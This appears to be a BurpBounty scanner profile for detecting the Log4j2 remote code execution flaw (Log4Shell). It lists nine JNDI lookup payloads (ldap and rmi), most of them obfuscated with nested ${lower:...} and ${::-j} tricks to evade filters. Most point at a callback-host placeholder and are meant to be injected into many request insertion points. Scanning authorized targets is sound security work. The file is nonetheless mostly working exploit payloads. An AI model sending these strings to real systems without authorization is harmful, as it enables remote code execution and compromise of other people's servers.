[
  {
    "ProfileName": "202112_14_Log4j2_RCE(绕过)",
    "Name": "",
    "Enabled": true,
    "Scanner": 1,
    "Author": "@Leesin1973",
    "Payloads": [
      "true,${jndi:ldap://{BC}} ",
      "true,${${:-j}${:-n}${:-d}${:-i}:${:-l}${:-d}${:-a}${:-p}://{BC}}",
      "true,${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://{BC}}/ass}",
      "true,${${::-j}ndi:rmi://{BC}/ass}",
      "true,${jndi:rmi://adsasd.asdasd.asdasd}",
      "true,${${lower:jndi}:${lower:rmi}://{BC}/poc}",
      "true,${${lower:${lower:jndi}}:${lower:rmi}://{BC}/poc}",
      "true,${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://{BC}/poc}",
      "true,${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://{BC}/poc}"
    ],
    "Encoder": [],
    "UrlEncode": false,
    "CharsToUrlEncode": "",
    "Grep": [],
    "Tags": [
      "阿帕奇",
      "all",
      "All"
    ],
    "PayloadResponse": false,
    "NotResponse": false,
    "TimeOut1": "",
    "TimeOut2": "",
    "isTime": false,
    "contentLength": "",
    "iscontentLength": false,
    "CaseSensitive": false,
    "ExcludeHTTP": false,
    "OnlyHTTP": false,
    "IsContentType": false,
    "ContentType": "",
    "HttpResponseCode": "",
    "NegativeCT": false,
    "IsResponseCode": false,
    "ResponseCode": "",
    "NegativeRC": false,
    "urlextension": "",
    "isurlextension": false,
    "NegativeUrlExtension": false,
    "MatchType": 1,
    "Scope": 0,
    "RedirType": 4,
    "MaxRedir": 0,
    "payloadPosition": 1,
    "payloadsFile": "",
    "grepsFile": "",
    "IssueName": "Log4j2_rce",
    "IssueSeverity": "High",
    "IssueConfidence": "Certain",
    "IssueDetail": "Log4j2_rce\u003cpayload\u003e",
    "RemediationDetail": "测试",
    "IssueBackground": "Log4j2_rce\u003cpayload\u003e",
    "RemediationBackground": "测试",
    "Header": [],
    "VariationAttributes": [],
    "InsertionPointType": [
      18,
      65,
      32,
      36,
      7,
      1,
      2,
      6,
      33,
      5,
      35,
      34,
      64,
      0,
      3,
      4,
      37,
      127,
      65,
      32,
      36,
      7,
      1,
      2,
      6,
      33,
      5,
      35,
      34,
      64,
      0,
      3,
      4,
      37,
      127
    ],
    "Scanas": false,
    "Scantype": 0,
    "pathDiscovery": false
  }
]